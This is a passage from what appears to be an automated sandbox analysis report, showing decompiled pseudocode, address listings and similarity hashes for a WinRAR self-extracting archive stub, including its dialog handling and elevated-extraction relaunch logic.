                                                                            													__eflags = _t194;
                                                                            													if(_t194 != 0) {
                                                                            														__eflags =  *((char*)(_t272 + 0x4ad1));
                                                                            														if( *((char*)(_t272 + 0x4ad1)) == 0) {
                                                                            															L48:
                                                                            															__eflags =  *((char*)(_t272 + 0x4ad0));
                                                                            															if( *((char*)(_t272 + 0x4ad0)) == 0) {
                                                                            																__eflags =  *((char*)(_t272 + 0x4ad3));
                                                                            																if( *((char*)(_t272 + 0x4ad3)) != 0) {
                                                                            																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
                                                                            																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
                                                                            																	__eflags = _t263 - _t181;
                                                                            																	if(_t263 > _t181) {
                                                                            																		_t263 = _t263 - _t181;
                                                                            																		 *(_t276 + 0x2c) = _t263;
                                                                            																		E001B0E40(_t230, _t181 + _t230, _t263);
                                                                            																		_t276 = _t276 + 0xc;
                                                                            																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
                                                                            																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
                                                                            																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
                                                                            																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
                                                                            																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
                                                                            																		__eflags =  *(_t276 + 0x14);
                                                                            																		if( *(_t276 + 0x14) != 0) {
                                                                            																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
                                                                            																			E001AEA80(_t188, _t272, 0x4ae4);
                                                                            																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
                                                                            																			_t263 =  *(_t276 + 0x2c);
                                                                            																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
                                                                            																			 *((char*)(_t272 + 0x4ad3)) = 0;
                                                                            																			goto L62;
                                                                            																		}
                                                                            																		goto L63;
                                                                            																	}
                                                                            																} else {
                                                                            																	__eflags =  *((char*)(_t272 + 0x28));
                                                                            																	if( *((char*)(_t272 + 0x28)) != 0) {
                                                                            																		_t175 = 1;
                                                                            																		 *((char*)(_t276 + 0x12)) = 1;
                                                                            																		L53:
                                                                            																		__eflags = _t175;
                                                                            																		if(_t175 == 0) {
                                                                            																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
                                                                            																			_t263 = _t263 - _t268;
                                                                            																			__eflags = _t263 - 0x400;
                                                                            																			if(_t263 < 0x400) {
                                                                            																				__eflags = _t263;
                                                                            																				if(__eflags >= 0) {
                                                                            																					if(__eflags <= 0) {
                                                                            																						L63:
                                                                            																						_t268 = 0;
                                                                            																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
                                                                            																						L68:
                                                                            																						__eflags =  *((char*)(_t276 + 0x12));
                                                                            																						if( *((char*)(_t276 + 0x12)) == 0) {
                                                                            																							goto L4;
                                                                            																						}
                                                                            																					} else {
                                                                            																						E001B0E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
                                                                            																						L62:
                                                                            																						_t276 = _t276 + 0xc;
                                                                            																						goto L63;
                                                                            																					}
                                                                            																				}
                                                                            																			} else {
                                                                            																				_t263 =  *(_t276 + 0x20);
                                                                            																				goto L56;
                                                                            																			}
                                                                            																		}
                                                                            																	} else {
                                                                            																		goto L51;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														} else {
                                                                            															goto L47;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												goto L69;
                                                                            												L51:
                                                                            												_t260 = _t260 + 0x4ae4;
                                                                            												_t193 =  *(_t276 + 0x14) + 1;
                                                                            												 *(_t276 + 0x14) = _t193;
                                                                            												__eflags = _t193 -  *(_t276 + 0x1c);
                                                                            											} while (_t193 <  *(_t276 + 0x1c));
                                                                            											goto L52;
                                                                            										}
                                                                            									}
                                                                            									goto L69;
                                                                            								}
                                                                            							}
                                                                            							continue;
                                                                            						}
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				L69:
                                                                            				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
                                                                            				E001A47DA(_t216);
                                                                            				_t241 =  *(_t276 + 0x28) * 0x4ae4;
                                                                            				_t164 =  *((intOrPtr*)(_t216 + 0x18));
                                                                            				_t223 = 5;
                                                                            				__eflags = _t164 + _t241 + 0x30;
                                                                            				return E001AEA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
                                                                            			}










































                                                                            0x001a6443
                                                                            0x001a6447
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6447
                                                                            0x001a63cf
                                                                            0x001a63d2
                                                                            0x001a63d6
                                                                            0x001a63dc
                                                                            0x001a63dd
                                                                            0x001a63e2
                                                                            0x001a63e4
                                                                            0x001a645f
                                                                            0x001a645f
                                                                            0x001a63e6
                                                                            0x001a63e6
                                                                            0x001a63ea
                                                                            0x001a63f5
                                                                            0x001a63f5
                                                                            0x001a63f9
                                                                            0x00000000
                                                                            0x001a63ec
                                                                            0x001a63ec
                                                                            0x001a63f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a63f3
                                                                            0x001a63ea
                                                                            0x001a63e4
                                                                            0x001a63cd
                                                                            0x00000000
                                                                            0x001a6450
                                                                            0x001a6453
                                                                            0x001a6455
                                                                            0x001a6455
                                                                            0x001a645d
                                                                            0x001a6464
                                                                            0x001a6464
                                                                            0x001a646a
                                                                            0x001a646f
                                                                            0x001a6471
                                                                            0x001a6473
                                                                            0x001a6475
                                                                            0x001a6475
                                                                            0x001a6475
                                                                            0x001a6476
                                                                            0x001a6478
                                                                            0x001a647a
                                                                            0x001a647c
                                                                            0x001a647e
                                                                            0x001a6482
                                                                            0x001a6482
                                                                            0x001a6488
                                                                            0x001a648c
                                                                            0x001a6490
                                                                            0x001a6494
                                                                            0x001a6496
                                                                            0x001a6499
                                                                            0x001a649b
                                                                            0x001a649e
                                                                            0x001a64a0
                                                                            0x001a64a2
                                                                            0x001a64a4
                                                                            0x001a64a4
                                                                            0x001a64a6
                                                                            0x001a64ab
                                                                            0x001a64ae
                                                                            0x001a64c3
                                                                            0x001a64b0
                                                                            0x001a64b3
                                                                            0x001a64b3
                                                                            0x001a64cc
                                                                            0x001a64ce
                                                                            0x001a64d2
                                                                            0x001a64d6
                                                                            0x001a64d6
                                                                            0x001a64dc
                                                                            0x001a64dc
                                                                            0x001a64e0
                                                                            0x001a64e4
                                                                            0x001a64e6
                                                                            0x001a6641
                                                                            0x00000000
                                                                            0x001a64ec
                                                                            0x001a64ef
                                                                            0x001a64f6
                                                                            0x001a64fa
                                                                            0x001a64fc
                                                                            0x001a6568
                                                                            0x001a6568
                                                                            0x00000000
                                                                            0x001a64fe
                                                                            0x001a64fe
                                                                            0x001a64fe
                                                                            0x001a6500
                                                                            0x001a6503
                                                                            0x001a6505
                                                                            0x001a650c
                                                                            0x001a6527
                                                                            0x001a652a
                                                                            0x001a652f
                                                                            0x001a6531
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a650e
                                                                            0x001a6511
                                                                            0x001a6516
                                                                            0x001a6518
                                                                            0x001a651e
                                                                            0x001a6525
                                                                            0x001a6537
                                                                            0x001a6537
                                                                            0x001a653e
                                                                            0x001a6544
                                                                            0x001a654b
                                                                            0x001a65a2
                                                                            0x001a65a7
                                                                            0x001a65aa
                                                                            0x001a65ac
                                                                            0x001a65b2
                                                                            0x001a65b9
                                                                            0x001a65bd
                                                                            0x001a65c5
                                                                            0x001a65cb
                                                                            0x001a65ce
                                                                            0x001a65d2
                                                                            0x001a65d9
                                                                            0x001a65dd
                                                                            0x001a65e4
                                                                            0x001a65e6
                                                                            0x001a65e8
                                                                            0x001a65fe
                                                                            0x001a6606
                                                                            0x001a660f
                                                                            0x001a6613
                                                                            0x001a6619
                                                                            0x00000000
                                                                            0x001a6619
                                                                            0x00000000
                                                                            0x001a65e6
                                                                            0x001a654d
                                                                            0x001a654d
                                                                            0x001a6551
                                                                            0x001a6597
                                                                            0x001a6599
                                                                            0x001a656c
                                                                            0x001a656c
                                                                            0x001a656e
                                                                            0x001a6574
                                                                            0x001a6578
                                                                            0x001a657a
                                                                            0x001a6580
                                                                            0x001a662b
                                                                            0x001a662d
                                                                            0x001a662f
                                                                            0x001a6623
                                                                            0x001a6623
                                                                            0x001a6625
                                                                            0x001a6645
                                                                            0x001a6645
                                                                            0x001a664a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6631
                                                                            0x001a663a
                                                                            0x001a6620
                                                                            0x001a6620
                                                                            0x00000000
                                                                            0x001a6620
                                                                            0x001a662f
                                                                            0x001a6586
                                                                            0x001a6586
                                                                            0x00000000
                                                                            0x001a6586
                                                                            0x001a6580
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6551
                                                                            0x001a654b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6525
                                                                            0x001a6518
                                                                            0x00000000
                                                                            0x001a6553
                                                                            0x001a6557
                                                                            0x001a655d
                                                                            0x001a655e
                                                                            0x001a6562
                                                                            0x001a6562
                                                                            0x00000000
                                                                            0x001a6500
                                                                            0x001a64fc
                                                                            0x00000000
                                                                            0x001a64e6
                                                                            0x001a6592
                                                                            0x00000000
                                                                            0x001a6334
                                                                            0x001a6328
                                                                            0x00000000
                                                                            0x001a6320
                                                                            0x001a6650
                                                                            0x001a6658
                                                                            0x001a665b
                                                                            0x001a6660
                                                                            0x001a666e
                                                                            0x001a6673
                                                                            0x001a6681
                                                                            0x001a669f

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 97ee14bc718f819e17110ec6b98e0b6da9f439fd5a0366c17f1c1c9f3106f925
                                                                            • Instruction ID: bf629c9cefffd28ce3b8256893aa2bcead556efcb924989f9cb08c9a8e2ec7e2
                                                                            • Opcode Fuzzy Hash: 97ee14bc718f819e17110ec6b98e0b6da9f439fd5a0366c17f1c1c9f3106f925
                                                                            • Instruction Fuzzy Hash: 0ED107B5A043418FDB14CF28C88579BBBE0BF9A308F0C456DE8489B642D734E958CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E001AA5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                                                            				void* __ebx;
                                                                            				long _t105;
                                                                            				long _t106;
                                                                            				struct HWND__* _t107;
                                                                            				struct HWND__* _t111;
                                                                            				void* _t114;
                                                                            				void* _t115;
                                                                            				int _t116;
                                                                            				void* _t133;
                                                                            				void* _t137;
                                                                            				signed int _t149;
                                                                            				struct HWND__* _t152;
                                                                            				void* _t163;
                                                                            				void* _t166;
                                                                            				int _t169;
                                                                            				void* _t182;
                                                                            				struct HWND__* _t189;
                                                                            				void* _t190;
                                                                            				long _t195;
                                                                            				void* _t220;
                                                                            				signed int _t230;
                                                                            				void* _t231;
                                                                            				void* _t246;
                                                                            				long _t247;
                                                                            				long _t248;
                                                                            				long _t249;
                                                                            				signed int _t254;
                                                                            				WCHAR* _t255;
                                                                            				int _t259;
                                                                            				int _t261;
                                                                            				void* _t266;
                                                                            				void* _t270;
                                                                            				signed short _t275;
                                                                            				int _t277;
                                                                            				struct HWND__* _t279;
                                                                            				WCHAR* _t286;
                                                                            				WCHAR* _t288;
                                                                            				intOrPtr _t290;
                                                                            				void* _t299;
                                                                            				void* _t300;
                                                                            				struct HWND__* _t302;
                                                                            				signed int _t305;
                                                                            				void* _t306;
                                                                            				struct HWND__* _t308;
                                                                            				void* _t310;
                                                                            				long _t312;
                                                                            				struct HWND__* _t315;
                                                                            				struct HWND__* _t316;
                                                                            				void* _t317;
                                                                            				void* _t319;
                                                                            				void* _t321;
                                                                            				void* _t323;
                                                                            
                                                                            				_t299 = __edx;
                                                                            				_t285 = __ecx;
                                                                            				E001AD870(E001C14F6, _t321);
                                                                            				E001AD940();
                                                                            				_t275 =  *(_t321 + 0x10);
                                                                            				_t305 =  *(_t321 + 0xc);
                                                                            				_t302 =  *(_t321 + 8);
                                                                            				if(E001912D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
                                                                            					_t306 = _t305 - 0x110;
                                                                            					__eflags = _t306;
                                                                            					if(__eflags == 0) {
                                                                            						E001AC343(_t299, __eflags, __fp0, _t302);
                                                                            						_t105 =  *0x1db704;
                                                                            						_t277 = 1;
                                                                            						 *0x1d75d8 = _t302;
                                                                            						 *0x1d75c8 = _t302;
                                                                            						__eflags = _t105;
                                                                            						if(_t105 != 0) {
                                                                            							SendMessageW(_t302, 0x80, 1, _t105); // executed
                                                                            						}
                                                                            						_t106 =  *0x1e5d04;
                                                                            						__eflags = _t106;
                                                                            						if(_t106 != 0) {
                                                                            							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
                                                                            						}
                                                                            						_t107 = GetDlgItem(_t302, 0x68);
                                                                            						 *(_t321 + 0x14) = _t107;
                                                                            						SendMessageW(_t107, 0x435, 0, 0x400000);
                                                                            						E001A95F8(_t321 - 0x1164, 0x800);
                                                                            						_t111 = GetDlgItem(_t302, 0x66);
                                                                            						__eflags =  *0x1d9602;
                                                                            						_t308 = _t111;
                                                                            						 *(_t321 + 0x10) = _t308;
                                                                            						_t286 = 0x1d9602;
                                                                            						if( *0x1d9602 == 0) {
                                                                            							_t286 = _t321 - 0x1164;
                                                                            						}
                                                                            						SetWindowTextW(_t308, _t286);
                                                                            						E001A9A32(_t308); // executed
                                                                            						_push(0x1d75e4);
                                                                            						_push(0x1d75e0);
                                                                            						_push(0x1ece18);
                                                                            						_push(_t302);
                                                                            						 *0x1d75d6 = 0; // executed
                                                                            						_t114 = E001A9EEF(_t286, _t299, __eflags); // executed
                                                                            						__eflags = _t114;
                                                                            						if(_t114 == 0) {
                                                                            							 *0x1d75d1 = _t277;
                                                                            						}
                                                                            						__eflags =  *0x1d75e4;
                                                                            						if( *0x1d75e4 > 0) {
                                                                            							_push(7);
                                                                            							_push( *0x1d75e0);
                                                                            							_push(_t302);
                                                                            							E001AB4C7(_t299);
                                                                            						}
                                                                            						__eflags =  *0x1ede20;
                                                                            						if( *0x1ede20 == 0) {
                                                                            							SetDlgItemTextW(_t302, 0x6b, E0019DA42(_t286, 0xbf));
                                                                            							SetDlgItemTextW(_t302, _t277, E0019DA42(_t286, 0xbe));
                                                                            						}
                                                                            						__eflags =  *0x1d75e4;
                                                                            						if( *0x1d75e4 <= 0) {
                                                                            							L103:
                                                                            							__eflags =  *0x1d75d6;
                                                                            							if( *0x1d75d6 != 0) {
                                                                            								L114:
                                                                            								__eflags =  *0x1d95fc - 2;
                                                                            								if( *0x1d95fc == 2) {
                                                                            									EnableWindow(_t308, 0);
                                                                            								}
                                                                            								__eflags =  *0x1d85f8;
                                                                            								if( *0x1d85f8 != 0) {
                                                                            									E00191294(_t302, 0x67, 0);
                                                                            									E00191294(_t302, 0x66, 0);
                                                                            								}
                                                                            								_t115 =  *0x1d95fc;
                                                                            								__eflags = _t115;
                                                                            								if(_t115 != 0) {
                                                                            									__eflags =  *0x1d75d7;
                                                                            									if( *0x1d75d7 == 0) {
                                                                            										_push(0);
                                                                            										_push(_t277);
                                                                            										_push(0x111);
                                                                            										_push(_t302);
                                                                            										__eflags = _t115 - _t277;
                                                                            										if(_t115 != _t277) {
                                                                            											 *0x1cdf38();
                                                                            										} else {
                                                                            											SendMessageW(); // executed
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								__eflags =  *0x1d75d1;
                                                                            								if( *0x1d75d1 != 0) {
                                                                            									SetDlgItemTextW(_t302, _t277, E0019DA42(_t286, 0x90));
                                                                            								}
                                                                            								goto L125;
                                                                            							}
                                                                            							__eflags =  *0x1ece0c;
                                                                            							if( *0x1ece0c != 0) {
                                                                            								goto L114;
                                                                            							}
                                                                            							__eflags =  *0x1d95fc;
                                                                            							if( *0x1d95fc != 0) {
                                                                            								goto L114;
                                                                            							}
                                                                            							__eflags = 0;
                                                                            							_t310 = 0xaa;
                                                                            							 *((short*)(_t321 - 0x9688)) = 0;
                                                                            							do {
                                                                            								__eflags = _t310 - 0xaa;
                                                                            								if(_t310 != 0xaa) {
                                                                            									L109:
                                                                            									__eflags = _t310 - 0xab;
                                                                            									if(__eflags != 0) {
                                                                            										L111:
                                                                            										E0019FA89(__eflags, _t321 - 0x9688, " ", 0x2000);
                                                                            										E0019FA89(__eflags, _t321 - 0x9688, E0019DA42(_t286, _t310), 0x2000);
                                                                            										goto L112;
                                                                            									}
                                                                            									__eflags =  *0x1ede20;
                                                                            									if(__eflags != 0) {
                                                                            										goto L112;
                                                                            									}
                                                                            									goto L111;
                                                                            								}
                                                                            								__eflags =  *0x1ede20;
                                                                            								if( *0x1ede20 == 0) {
                                                                            									goto L112;
                                                                            								}
                                                                            								goto L109;
                                                                            								L112:
                                                                            								_t310 = _t310 + 1;
                                                                            								__eflags = _t310 - 0xb0;
                                                                            							} while (__eflags <= 0);
                                                                            							_t286 =  *0x1d75e8; // 0x0
                                                                            							E001A8FE6(_t286, __eflags,  *0x1d0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
                                                                            							_t308 =  *(_t321 + 0x10);
                                                                            							goto L114;
                                                                            						} else {
                                                                            							_push(0);
                                                                            							_push( *0x1d75e0);
                                                                            							_push(_t302); // executed
                                                                            							E001AB4C7(_t299); // executed
                                                                            							_t133 =  *0x1ece0c;
                                                                            							__eflags = _t133;
                                                                            							if(_t133 != 0) {
                                                                            								__eflags =  *0x1d95fc;
                                                                            								if(__eflags == 0) {
                                                                            									_t288 =  *0x1d75e8; // 0x0
                                                                            									E001A8FE6(_t288, __eflags,  *0x1d0064,  *(_t321 + 0x14), _t133, 0, 0);
                                                                            									L001B2B4E( *0x1ece0c);
                                                                            									_pop(_t286);
                                                                            								}
                                                                            							}
                                                                            							__eflags =  *0x1d95fc - _t277;
                                                                            							if( *0x1d95fc == _t277) {
                                                                            								L102:
                                                                            								_push(_t277);
                                                                            								_push( *0x1d75e0);
                                                                            								_push(_t302);
                                                                            								E001AB4C7(_t299);
                                                                            								goto L103;
                                                                            							} else {
                                                                            								 *0x1cdf3c(_t302);
                                                                            								__eflags =  *0x1d95fc - _t277;
                                                                            								if( *0x1d95fc == _t277) {
                                                                            									goto L102;
                                                                            								}
                                                                            								__eflags =  *0x1d9601;
                                                                            								if( *0x1d9601 != 0) {
                                                                            									goto L102;
                                                                            								}
                                                                            								_push(3);
                                                                            								_push( *0x1d75e0);
                                                                            								_push(_t302);
                                                                            								E001AB4C7(_t299);
                                                                            								__eflags =  *0x1ede18;
                                                                            								if( *0x1ede18 == 0) {
                                                                            									goto L102;
                                                                            								}
                                                                            								_t137 = DialogBoxParamW( *0x1d0064, L"LICENSEDLG", 0, E001AA3E1, 0);
                                                                            								__eflags = _t137;
                                                                            								if(_t137 == 0) {
                                                                            									L25:
                                                                            									 *0x1d75d7 = _t277;
                                                                            									L26:
                                                                            									_push(_t277);
                                                                            									L13:
                                                                            									EndDialog(_t302, ??); // executed
                                                                            									L125:
                                                                            									_t116 = _t277;
                                                                            									L126:
                                                                            									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
                                                                            									return _t116;
                                                                            								}
                                                                            								goto L102;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					__eflags = _t306 != 1;
                                                                            					if(_t306 != 1) {
                                                                            						L7:
                                                                            						_t116 = 0;
                                                                            						goto L126;
                                                                            					}
                                                                            					_t149 = (_t275 & 0x0000ffff) - 1;
                                                                            					__eflags = _t149;
                                                                            					if(_t149 == 0) {
                                                                            						__eflags =  *0x1d75d0;
                                                                            						if( *0x1d75d0 != 0) {
                                                                            							L23:
                                                                            							_t312 = 0x800;
                                                                            							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
                                                                            							__eflags =  *0x1d75d0;
                                                                            							if( *0x1d75d0 == 0) {
                                                                            								__eflags =  *0x1d75d1;
                                                                            								if( *0x1d75d1 == 0) {
                                                                            									_t152 = GetDlgItem(_t302, 0x68);
                                                                            									__eflags =  *0x1d75cc;
                                                                            									_t279 = _t152;
                                                                            									if( *0x1d75cc == 0) {
                                                                            										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
                                                                            										SendMessageW(_t279, 0xc2, 0, 0x1c22e4);
                                                                            										_t312 = 0x800;
                                                                            									}
                                                                            									SetFocus(_t279);
                                                                            									__eflags =  *0x1d85f8;
                                                                            									if( *0x1d85f8 == 0) {
                                                                            										E0019FAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
                                                                            										E001AC10F(_t285, _t321 - 0x1164, _t312);
                                                                            										E00193E41(_t321 - 0x4288, 0x880, E0019DA42(_t285, 0xb9), _t321 - 0x1164);
                                                                            										_t323 = _t323 + 0x10;
                                                                            										_t163 = _t321 - 0x4288;
                                                                            									} else {
                                                                            										_t163 = E0019DA42(_t285, 0xba);
                                                                            									}
                                                                            									E001AC190(0, _t163);
                                                                            									__eflags =  *0x1d9601;
                                                                            									if( *0x1d9601 == 0) {
                                                                            										E001AC7FC(_t321 - 0x2164);
                                                                            									}
                                                                            									_push(0);
                                                                            									_push(_t321 - 0x2164);
                                                                            									 *(_t321 + 0x17) = 0;
                                                                            									_t166 = E00199D3A(0, _t321);
                                                                            									_t277 = 1;
                                                                            									__eflags = _t166;
                                                                            									if(_t166 != 0) {
                                                                            										L40:
                                                                            										_t300 = E001A9A8D(_t321 - 0x2164);
                                                                            										 *((char*)(_t321 + 0x13)) = _t300;
                                                                            										__eflags = _t300;
                                                                            										if(_t300 != 0) {
                                                                            											L43:
                                                                            											_t169 =  *(_t321 + 0x17);
                                                                            											L44:
                                                                            											_t285 =  *0x1d9601;
                                                                            											__eflags = _t285;
                                                                            											if(_t285 != 0) {
                                                                            												L50:
                                                                            												__eflags =  *((char*)(_t321 + 0x13));
                                                                            												if( *((char*)(_t321 + 0x13)) != 0) {
                                                                            													 *0x1d75dc = _t277;
                                                                            													E001912B2(_t302, 0x67, 0);
                                                                            													E001912B2(_t302, 0x66, 0);
                                                                            													SetDlgItemTextW(_t302, _t277, E0019DA42(_t285, 0xe6)); // executed
                                                                            													E001912B2(_t302, 0x69, _t277);
                                                                            													SetDlgItemTextW(_t302, 0x65, 0x1c22e4); // executed
                                                                            													_t315 = GetDlgItem(_t302, 0x65);
                                                                            													__eflags = _t315;
                                                                            													if(_t315 != 0) {
                                                                            														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
                                                                            														__eflags = _t195;
                                                                            														SetWindowLongW(_t315, 0xfffffff0, _t195);
                                                                            													}
                                                                            													_push(5);
                                                                            													_push( *0x1d75e0);
                                                                            													_push(_t302);
                                                                            													E001AB4C7(_t300);
                                                                            													_push(2);
                                                                            													_push( *0x1d75e0);
                                                                            													_push(_t302);
                                                                            													E001AB4C7(_t300);
                                                                            													_push(0x1ece18);
                                                                            													_push(_t302);
                                                                            													 *0x1efe3c = _t277; // executed
                                                                            													E001AC6FF(_t285, __eflags); // executed
                                                                            													_push(6);
                                                                            													_push( *0x1d75e0);
                                                                            													 *0x1efe3c = 0;
                                                                            													_push(_t302);
                                                                            													E001AB4C7(_t300);
                                                                            													__eflags =  *0x1d75d7;
                                                                            													if( *0x1d75d7 == 0) {
                                                                            														__eflags =  *0x1d75cc;
                                                                            														if( *0x1d75cc == 0) {
                                                                            															__eflags =  *0x1ede2c;
                                                                            															if( *0x1ede2c == 0) {
                                                                            																_push(4);
                                                                            																_push( *0x1d75e0);
                                                                            																_push(_t302);
                                                                            																E001AB4C7(_t300);
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            													E00191294(_t302, _t277, _t277);
                                                                            													 *0x1d75dc =  *0x1d75dc & 0x00000000;
                                                                            													__eflags =  *0x1d75dc;
                                                                            													_t182 =  *0x1d75d7; // 0x1
                                                                            													goto L75;
                                                                            												}
                                                                            												__eflags = _t285;
                                                                            												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
                                                                            												__eflags = _t169;
                                                                            												L52:
                                                                            												__eflags = _t169;
                                                                            												 *(_t321 + 0x17) = _t169 == 0;
                                                                            												__eflags = _t169;
                                                                            												if(_t169 == 0) {
                                                                            													L66:
                                                                            													__eflags =  *(_t321 + 0x17);
                                                                            													if( *(_t321 + 0x17) != 0) {
                                                                            														_push(E0019DA42(_t285, 0x9a));
                                                                            														E00193E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
                                                                            														E00196E03(0x1d00e0, _t277);
                                                                            														E001A9735(_t302, _t321 - 0x5688, E0019DA42(0x1d00e0, 0x96), 0x30);
                                                                            														 *0x1d75cc =  *0x1d75cc + 1;
                                                                            													}
                                                                            													L12:
                                                                            													_push(0);
                                                                            													goto L13;
                                                                            												}
                                                                            												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
                                                                            												_t285 = 0x1db602;
                                                                            												E0019E7AA(0x1db602, _t321 - 0x164, 0x80);
                                                                            												_push(0x1da602);
                                                                            												E00193E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
                                                                            												_t323 = _t323 + 0x14;
                                                                            												 *(_t321 - 0x48) = 0x3c;
                                                                            												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
                                                                            												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
                                                                            												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
                                                                            												 *(_t321 - 0x40) = _t302;
                                                                            												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
                                                                            												 *(_t321 - 0x2c) = _t277;
                                                                            												 *((intOrPtr*)(_t321 - 0x28)) = 0;
                                                                            												 *((intOrPtr*)(_t321 - 0x30)) = 0x1d75f8;
                                                                            												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
                                                                            												 *(_t321 + 8) = _t317;
                                                                            												__eflags = _t317;
                                                                            												if(_t317 == 0) {
                                                                            													 *(_t321 + 0x10) =  *(_t321 + 0x14);
                                                                            												} else {
                                                                            													 *0x1e5d08 = 0;
                                                                            													_t231 = GetCommandLineW();
                                                                            													__eflags = _t231;
                                                                            													if(_t231 != 0) {
                                                                            														E0019FAB1(0x1e5d0a, _t231, 0x2000);
                                                                            													}
                                                                            													E001AA24E(_t285, 0x1e9d0a, 7);
                                                                            													E001AA24E(_t285, 0x1ead0a, 2);
                                                                            													E001AA24E(_t285, 0x1ebd0a, 0x10);
                                                                            													 *0x1ece0b = _t277;
                                                                            													_t285 = 0x1ecd0a;
                                                                            													E0019E90C(_t277, 0x1ecd0a, _t321 - 0x164);
                                                                            													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
                                                                            													E001AEA80(_t238, 0x1e5d08, 0x7104);
                                                                            													_t323 = _t323 + 0xc;
                                                                            												}
                                                                            												_t220 = ShellExecuteExW(_t321 - 0x48);
                                                                            												E0019E957(_t321 - 0x164, 0x80);
                                                                            												E0019E957(_t321 - 0x11ca0, 0x430c);
                                                                            												__eflags = _t220;
                                                                            												if(_t220 == 0) {
                                                                            													_t319 =  *(_t321 + 0x10);
                                                                            													 *(_t321 + 0x17) = _t277;
                                                                            													goto L64;
                                                                            												} else {
                                                                            													 *0x1cdf20( *(_t321 - 0x10), 0x2710);
                                                                            													_t71 = _t321 + 0xc;
                                                                            													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
                                                                            													__eflags =  *_t71;
                                                                            													_t319 =  *(_t321 + 0x10);
                                                                            													while(1) {
                                                                            														__eflags =  *_t319;
                                                                            														if( *_t319 != 0) {
                                                                            															break;
                                                                            														}
                                                                            														Sleep(0x64);
                                                                            														_t230 =  *(_t321 + 0xc) + 1;
                                                                            														 *(_t321 + 0xc) = _t230;
                                                                            														__eflags = _t230 - 0x64;
                                                                            														if(_t230 < 0x64) {
                                                                            															continue;
                                                                            														}
                                                                            														break;
                                                                            													}
                                                                            													 *0x1ede2c =  *(_t321 - 0x10);
                                                                            													L64:
                                                                            													__eflags =  *(_t321 + 8);
                                                                            													if( *(_t321 + 8) != 0) {
                                                                            														UnmapViewOfFile(_t319);
                                                                            														CloseHandle( *(_t321 + 8));
                                                                            													}
                                                                            													goto L66;
                                                                            												}
                                                                            											}
                                                                            											__eflags = _t300;
                                                                            											if(_t300 == 0) {
                                                                            												goto L52;
                                                                            											}
